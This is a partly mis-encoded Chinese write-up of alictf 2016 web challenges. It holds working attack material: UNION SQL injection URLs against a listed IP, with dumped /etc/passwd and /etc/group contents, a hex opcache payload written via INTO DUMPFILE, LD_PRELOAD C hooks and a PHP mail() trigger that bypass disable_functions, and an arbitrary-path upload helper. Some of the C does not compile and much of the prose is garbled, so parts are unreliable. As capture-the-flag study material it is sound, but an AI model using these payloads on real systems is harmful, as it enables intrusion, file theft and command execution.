
alictf2016_web_writeup

2016/06/06

鎰熻鏃堕棿鎬荤畻鏄浆浜嗕竴骞达紝鍘诲勾涔熷ぇ姒傛槸alictf鎵嶅紑濮嬭兘鍋氬嚭绛惧埌棰樼洰浠ュ鐨勯鐩紝浠婂勾寮烘捀浜嗕竴娉lictf锛屼笉寰椾笉璇达紝鍙堥亣鍒拌摑鑾茶姳+0ops鍑洪锛寃eb鐪熺殑闅惧害寰堥珮锛屾瘮杈冭泲鐤肩殑鏄痟omework锛岃瀹炶瘽鏄竴閬撴兂娉曞緢濂藉緢濂界殑棰樼洰锛屼絾鏄己琛屽拰asis鏈夊尯鍒紝鍐欎簡瀹炴垬鎯呭喌涓嶅悎鐨勬潈闄愨.涓嶇鎬庝箞璇磋繕鏄浜嗗緢澶氫笢瑗匡紝鏁寸悊涓媤p鈥


find password

题目其实挺蛋疼的，本来是简单的登陆盲注，但是却写了很多奇怪的过滤，导致写脚本的时候各种出问题，花了很长时间改，不过用了以前的通用脚本还是感觉不错的，在sqlmap不能用的情况，还是可以用，结尾贴github链接

鍏堣棰樼洰锛屽湪login鐨勬椂鍊欐湁涓涓猚heck璇锋眰瀛樺湪娉ㄥ叆锛屽彲浠ヤ紭鍖栨垚鐩叉敞锛岀櫥闄嗕竴涓笉瀛樺湪鐨勮处鎴锋槸鎻愮ず璐﹀彿瀵嗙爜閿欒锛岀櫥闄嗕竴涓瓨鍦ㄧ殑璐﹀彿鏃舵彁绀虹櫥闄嗘垚鍔熴

还有一些过滤，基本都能绕，但是搞得我写脚本写的很恶心。。。

select count table table_schema from where or and 空格 # / columns

鑰屼笖鏄浛鎹负绌猴紝鎵浠ョ洿鎺abtablele杩欐牱灏卞ソ浜嗐

github脚本

homework

题目很难，几乎算是最近撸得最难的题目了，但是踩了权限的坑，再加上出题人强行遭洞，导致很多问题都和本地差异很大，让我们来一点点儿说…

源码

detail.php
<?php
// detail.php: shows the "brief" column of the homework row selected by ?id=.
// conn.php is expected to open the DB connection, start the session and
// define query(); none of that is visible in this listing -- TODO confirm.
include("conn.php");
// Gate on a logged-in session; anonymous visitors are bounced to login.php.
if (!isset($_SESSION['username'])) {
header("Location: login.php");
exit();
}
// SQL INJECTION: $_GET['id'] is concatenated straight into the query text, so a
// quote inside the id parameter terminates the string literal. Mitigation: a
// prepared statement with a bound parameter (or an integer cast if id is numeric).
$sql = "SELECT brief FROM homework WHERE id= '" . $_GET['id'] . "'";
$result = query($sql);
// query() appears to return a list of rows; only the first row is kept.
if($result){
$result=$result[0];
}
?>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1,maximum-scale=1.0">
<title>Homework System</title>
<link href="css/bootstrap.css" rel="stylesheet">
<link rel="stylesheet" href="css/main.css">
</head>
<body>
<div class="container">
<fieldset>
<div class="panel panel-success">
<div class="panel-heading">
<legend>
Homework System
<a href="logout.php" class="return">Sign Out </a>
<br/>
</legend>
</div>
</div>
</fieldset>
<fieldset>
<div class="panel panel-info">
<div class="panel-heading">
<h3 class="panel-title"><legend>Your Homework</legend></h3>
</div>
<div class="panel-body">
<?php
// STORED XSS: the brief column is echoed without htmlspecialchars(), so whatever
// was stored in it is rendered as raw HTML. Escape on output.
if($result){
echo $result["brief"];
}
?>
</div>
</div>
</fieldset>
</div>
<!-- NOTE(review): stray closing tag -- no matching <script> is opened above it. -->
</script>
<script src="js/jquery-1.12.2.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</body>
</html>
<?php
// Homework submission handler: validates the text field "detail" and an
// optional picture upload, stores the picture under upload/, then inserts a row.
// conn.php presumably provides query() and the session -- not visible here.
include("conn.php");
// "detail" is mandatory and restricted to [A-Za-z0-9_]+, so it cannot carry
// quotes into the INSERT statement further down.
if(!isset($_POST["detail"]))
die();
$detail=$_POST["detail"];
if(!preg_match("/^\w+$/",$detail))
die("Only allow [\w+]!");
if(isset($_FILES['pic']['name'])&&$_FILES['pic']['name']!=="") {
$picname = $_FILES['pic']['name'];
// Client-supplied filename: word characters and dots only (no slashes), but any
// number of dots and any extension pass this check.
if(!preg_match("/^[\w.]+$/",$picname))
die("Filename only allow /^[\w.]+$/");
$picsize = $_FILES['pic']['size'];
// Always true here: the enclosing condition already required a non-empty name.
if ($picname != "") {
if ($picsize > 1024000) {
die('Too big!');
}
// Stored name = server timestamp + "-" + the original client filename.
$pics = date("YmdHis")."-".$picname;
$pic_path = "upload/". $pics;
// Extension filtering by substring blacklist on the client filename. The "ph"
// test alone already matches every later term (pht, php3/4/5), so those are
// redundant. A blacklist is a weak control for an upload directory that is
// served by the web server: prefer an extension allowlist, a server-generated
// name, and a storage location outside the web root or with script execution
// disabled.
if(stripos($picname,"ph")!==false||stripos($picname,"pht")!==false||stripos($picname,"php5")!==false||stripos($picname,"php4")!==false||stripos($picname,"php3")!==false)
file_put_contents($pic_path,"bad man!");
else
move_uploaded_file($_FILES['pic']['tmp_name'], $pic_path);
// Reached on both branches above (the placeholder file still yields a DB row).
// $_SESSION['username'] is interpolated unescaped; that is only safe if it was
// validated at registration/login, which this listing does not show -- a bound
// parameter would remove the dependency.
$sql = "INSERT INTO homework(username,brief) values('".$_SESSION['username']."','$detail')";
query($sql);
// The stored path is echoed back to the uploader. ("锛丳" is the mis-encoded
// fullwidth "！" of the original message; the literal is left untouched.)
echo "Upload Success锛丳ath:".$pic_path;
}
else
die("Where is your homework?");
}
else
die("Where is your homework?");
function getRandChar($length){
    /*
     * Builds a string of $length characters drawn from [A-Za-z0-9].
     * Uses rand(), which is not a cryptographically secure generator, so the
     * output is unsuitable for tokens or secrets.
     * Returns null when $length is zero or negative (nothing is ever appended
     * to the initial null).
     */
    $alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";
    $lastIndex = strlen($alphabet) - 1;
    $result = null;
    $remaining = $length;
    while ($remaining > 0) {
        $result .= $alphabet[rand(0, $lastIndex)];
        $remaining--;
    }
    return $result;
}

棣栧厛鏄笂浼犻〉闈㈠瓨鍦ㄦ敞鍏ワ紙杩欓噷寮濮嬫寲鍧戯級

http://121.40.50.146/detail.php?id=124'+and+'1'='1
http://121.40.50.146/detail.php?id=124'+and+'1'='2

棣栧厛鏄彂鐜版敞鍏ョ偣锛屾祴璇曡繃婊ゅ彂鐜版病鏈変换浣曡繃婊わ紝閭e氨鐩存帴娉ㄥ惂

http://121.40.50.146/detail.php?id=-124'+union+select+user()%23
fire@localhost
firecms
http://121.40.50.146/detail.php?id=-124'+UNION+SELECT+COUNT(*)+from+information_schema.tables+WHERE+table_schema+=+DATABASE()+limit+0,1%23
2
homework
user
http://121.40.50.146/detail.php?id=-124'+UNION+SELECT+COUNT(*)+from+information_schema.columns+WHERE+table_name+=+'homework'+limit+0,1%23
3
id
username
brief
http://121.40.50.146/detail.php?id=-124'+UNION+SELECT+count(*)+from+information_schema.columns+WHERE+table_name+=+'user'+limit+0,1%23
2
username
password

棣栧厛鏄敞鍏ユ病鏈変换浣曟敹鑾凤紝閭d箞寮濮嬪皾璇曡鏂囦欢

http://121.40.50.146/detail.php?id=-124'+UNION+SELECT+load_file('/etc/passwd')%23
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:109::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:114:MySQL Server,,,:/nonexistent:/bin/false
/etc/hosts
127.0.0.1 localhost 127.0.1.1 localhost.localdomain localhost # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters 10.251.236.147 iZ23bb0g4vdZ
/etc/group
root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4:syslog tty:x:5: disk:x:6: lp:x:7: mail:x:8: news:x:9: uucp:x:10: man:x:12: proxy:x:13: kmem:x:15: dialout:x:20: fax:x:21: voice:x:22: cdrom:x:24: floppy:x:25: tape:x:26: sudo:x:27: audio:x:29: dip:x:30: www-data:x:33: backup:x:34: operator:x:37: list:x:38: irc:x:39: src:x:40: gnats:x:41: shadow:x:42: utmp:x:43: video:x:44: sasl:x:45: plugdev:x:46: staff:x:50: games:x:60: users:x:100: nogroup:x:65534: libuuid:x:101: netdev:x:102: crontab:x:103: syslog:x:104: messagebus:x:105: fuse:x:106: mlocate:x:107: ssh:x:108: ntp:x:109: stapdev:x:110: stapusr:x:111: stapsys:x:112: ssl-cert:x:113: mysql:x:114:

娴嬭瘯鍙戠幇鍙互鍐欐枃浠讹紝浣嗘槸鍙湁mysql鐢ㄦ埛鐨勬潈闄愶紙鏈寮濮嬪叾瀹炴病鏈夋剰璇嗗埌锛屽悗鏉ヨ俯鍧戞墠鍙戠幇锛

由于这个权限问题，所以mysql没有读任何除了755文件以外的文件，apache和php的配置文件都没有读到。

花了很长时间测试为什么读不到东西，曾经以为mysql在docker中….第二天随手扫目录发现新收获

php opcache

鎵洰褰曞彂鐜颁簡寰堥噸瑕佺殑info.php鍜宲hpinfo.php鏂囦欢锛屾晠鍚嶆濇剰锛屼竴涓槸phpinfo().

info.php涓槸鎻愮ず锛堥鐩叧浜嗗繕璁颁繚瀛橈級锛屽ぇ鑷存剰鎬濇槸flag鍦ㄦ牴鐩綍锛宒isable_function ban浜嗕綘鑳芥兂鍒扮殑澶ч儴鍒嗗嚱鏁帮紝浣犻渶瑕佹兂鍒殑鍔炴硶銆

查看phpinfo()，一眼发现php opcache开启，了然于心，开始测试。

鐢变簬鍓嶆鏃堕棿杩橀亣鍒颁竴涓繖鏍风殑瀹炴垬棰樼洰锛屾墍浠ュ紑濮嬩竴鐩村緢椤哄埄
鏇剧粡鍐欑殑asis棰樼洰wp,閲岄潰灏辨槸杩欎釜娲

鑰屼笖鏈湴娴嬭瘯閫氳繃锛屼絾鏄嵈鍙戠幇涓涓泲鐤肩殑浜嬫儏鏄痮pcache榛樿鍙湁www鐨600,mysql瀹為檯涓婃病鏈変慨鏀圭殑鏉冮檺(浠ヨ嚦浜庝腑閫旈鐩寕浜嗛噸鍚箣鍚庯紝杩囦簡涓娈垫椂闂村嚭棰樹汉鎯宠捣鏉ヤ簡鎵嶄慨鏀逛簡opcache鏉冮檺鈥.)

涓嶇鎬庝箞鏍凤紝杩滅▼-鏈湴=鏃犵┓杩欎釜閬撶悊杩樻槸涓嶅彉锛屾祴璇曞彂鐜拌兘鎴愬姛鍐欏叆銆

ps:涓棿閬囧埌浜嗕竴涓緢澶х殑闂锛屼篃鏄俯浜嗗潙鎵嶅紕鏄庣櫧锛 涓鑸潵璇达紝鎴戜滑浣跨敤娉ㄥ叆鐐瑰啓鏂囦欢涓嶄細鍐欎竴涓獁ebshell杩涘幓锛堝洜涓烘潈闄愶級锛屾墍浠ュ緢灏戜細鐢╩ysql鍐欎簩杩涘埗杩欐牱鐨勬枃浠惰繘鍘伙紝鍚庢潵鍙戠幇intofile鍦ㄤ娇鐢ㄧ殑鏃跺欎細鎶16杩涘埗鐨00杩欐牱鐨勪笢瑗胯浆涓篭0,鐒跺悗灏辩偢浜嗭紝浣犻渶瑕佷娇鐢╠umpfile

http://121.40.50.146/detail.php?id=-124'+UNION+SELECT+0x4f504341434845003339623030356164373734323863343237383831343063363833396536323031d004000000000000000000000000000000000000000000000000000000000000751f2b0500000000a8010000000000000200000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0000005003000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000a80100000000000001000000040000000000000000000000ffffffff070000000002000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000700000012000000feffffff0000000000000000000000000000000000080000ffffffff0000000000000000e051840000000000010000000700000012000000feffffff0000000000000000000000000000000010000000ffffffff0000000000000000c04a84000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000d00400000000000000020000000000000000000000000000000000000000000000000000000000000000000067285100000000000000000004000000060600004c720f400838aed51e000000000000002f686f6d652f777777726f6f742f64656661756c742f64646f672e7068700000000000000000000000000000000000000000000000000000000000000000000070020000000000000600000000000000900200000000000006000000ffffffffc0020000000000000600000008000000e00200000000000006000000ffffffff080300000000000006000000ffffffff280300000000000006000000ffffffff010000000000000004000000ffffffff01000000060600006756a715530600800600000000000000707574656e7600000000000006060000d57bb4bed65a7ef917000000000000004c445f5052454c4f41443d2f746d702f64646f672e736f000100000006060000687f9a7c0100008004000000000000006d61696c000000000000000006060000afe020ba620f68c00b0000000000000061406c6f63616c686f737400000000000100000006060000051500000000008000000000000000000000000000000000000000000606000096db284491abf2ce0d000000000000004861636b2062792064646f672100000040958d000000000070000000000000000000000001000000020000003d080108309e89000000000010000000
010000006000000002000000020000004101080880e189000000000000000000000000006000000000000000020000008108082440958d0000000000b0000000200000000000000005000000030000003d080108309e890000000000300000000100000060000000020000000300000041010808309e890000000000400000000200000070000000020000000300000041010808309e890000000000400000000300000080000000020000000300000041010808309e890000000000400000000400000090000000020000000300000041010808309e8900000000004000000005000000a000000002000000030000004101080880e189000000000000000000000000006000000000000000030000008108082430308a000000000050000000000000000000000000000000040000002801080870178e0000000000600000000000000000000000ffffffff040000003e010808+into+dumpfile+'/tmp/OPcache/39b005ad77428c42788140c6839e6201/var/www/html/upload/20160606000605-20140410104212706.php.bin'#

在成功写入之后，意识到disable_function的问题没有解决。

鍒╃敤鐜鍙橀噺LD_PRELOAD鏉ョ粫杩噋hp disable_function鎵ц绯荤粺鍛戒护

文章原址

褰撶劧杩樻槸閭e彞璇濓紝鏈湴娴嬭瘯perfect鈥﹁繙绋嬭宕┿

首先写个c代码

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
 * Body of the LD_PRELOAD hook shown in the write-up: runs one fixed shell
 * command through system(), which writes a marker line to /tmp/test.
 * The empty parameter list is the old K&R form; C11 style is
 * "void payload(void)".
 */
void payload() {
system("echo '233' > /tmp/test");
}
/*
 * Interposes libc's geteuid(): once this object is loaded via LD_PRELOAD, a
 * program's call to geteuid() resolves to this definition. If LD_PRELOAD is
 * not set the hook is inert and returns 0; otherwise it removes LD_PRELOAD
 * from the environment (presumably so the shell spawned by payload() does not
 * load this object a second time) and runs payload().
 *
 * Two defects a compiler with -Wall will report:
 *  - the function is declared int but falls off the end after payload(), so
 *    the value the caller receives is indeterminate (C11 6.9.1p12);
 *  - "int geteuid()" does not match libc's "uid_t geteuid(void)" from
 *    <unistd.h>; including that header would make this a conflicting
 *    declaration.
 *
 * Defender's reading: this pattern is why putenv() -- and functions that
 * spawn a helper binary, such as mail() -- belong in disable_functions when
 * command execution is meant to be blocked, and why a web worker whose
 * environment carries LD_PRELOAD pointing into a web-writable directory is
 * worth alerting on.
 */
int geteuid() {
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}

编译为.so

# Two-step build: compile a position-independent object file, then link it as a
# shared object (the artifact that LD_PRELOAD loads).
$ gcc -c -fPIC hack.c -o hack
$ gcc -shared hack -o hack.so

然后编写php

<?php
// Sets LD_PRELOAD in this process's environment; any program the PHP worker
// spawns afterwards inherits it and loads hack.so. mail() is used here only as
// a trigger, because it causes the configured sendmail binary to be spawned.
// Defender's reading: when command execution is meant to be blocked,
// putenv() and mail() need to be on disable_functions alongside the exec
// family, and the worker should never be able to load objects from a
// web-writable path.
putenv("LD_PRELOAD=/var/www/hack.so");
mail("a@localhost","","","","");
?>

都上传上去之后测试，果不其然失败了

这里就是权限的原因了，我用mysql传了.so，然后echo '233' > /tmp/test，而test是我用mysql新建的文件，这里权限不够写不进去，后来,换了全程php方法。

在upload下写入upload.php还有读文件的php

<!-- Minimal file-drop form used in the write-up; the real work is the PHP below. -->
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
<?php
// Maximum error verbosity, rendered into the response.
error_reporting(-1);
ini_set("display_errors", 1);
// Arbitrary-destination write: the uploaded file is moved to whatever path the
// ?a2= query parameter names, with no validation. This is the attacker's own
// helper script; for detection purposes, move_uploaded_file() with a target
// taken from request input is the pattern a code scanner or WAF rule should flag.
move_uploaded_file($_FILES['file']['tmp_name'],$_GET['a2']);
echo "Hack by ddog!";
?>

读文件用了这个

// highlight_file() prints a file's source; it is a read primitive in its own right,
// so when readfile()/file_get_contents() and friends are placed on
// disable_functions, highlight_file() and show_source() need to go there too.
highlight_file(__FILE__)

重新测试之后发现几乎能想到的读文件和列目录方式都被ban了，没办法，那么用c语言进行列目录读文件…

#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<dirent.h>
/*
 * Directory-listing variant of the hook body: opens "/" and writes every
 * entry name into /tmp/ddog123, preceded by one line read from a second
 * stream.
 *
 * As printed this does not compile: dir, dp and fp2 are used but never
 * declared, and fp2 is never opened, so the fgets() has no source. The
 * opendir()/fopen() results are not checked before use, and the entry names
 * are written back-to-back with no separator.
 */
void payload() {
FILE *fp;
char buf[100];
dir = opendir("/");
fp = fopen("/tmp/ddog123", "w");
/* bounded read: at most 99 bytes plus the terminator fit in buf */
fgets(buf, 100, fp2);
fputs(buf, fp);
while ((dp = readdir(dir)) != NULL) {
fputs(dp->d_name, fp);
}
fclose(fp);
closedir(dir);
}
/*
 * Interposes libc's geteuid() when this object is loaded via LD_PRELOAD.
 * Returns 0 and does nothing if LD_PRELOAD is unset; otherwise clears it from
 * the environment and runs payload().
 *
 * Defects: the function is declared int but has no return after payload(),
 * so the caller's value is indeterminate; and the signature differs from
 * libc's "uid_t geteuid(void)" in <unistd.h>, which would be a conflicting
 * declaration if that header were included.
 */
int geteuid() {
if (getenv("LD_PRELOAD") == NULL) {
return 0;
}
unsetenv("LD_PRELOAD");
payload();
}
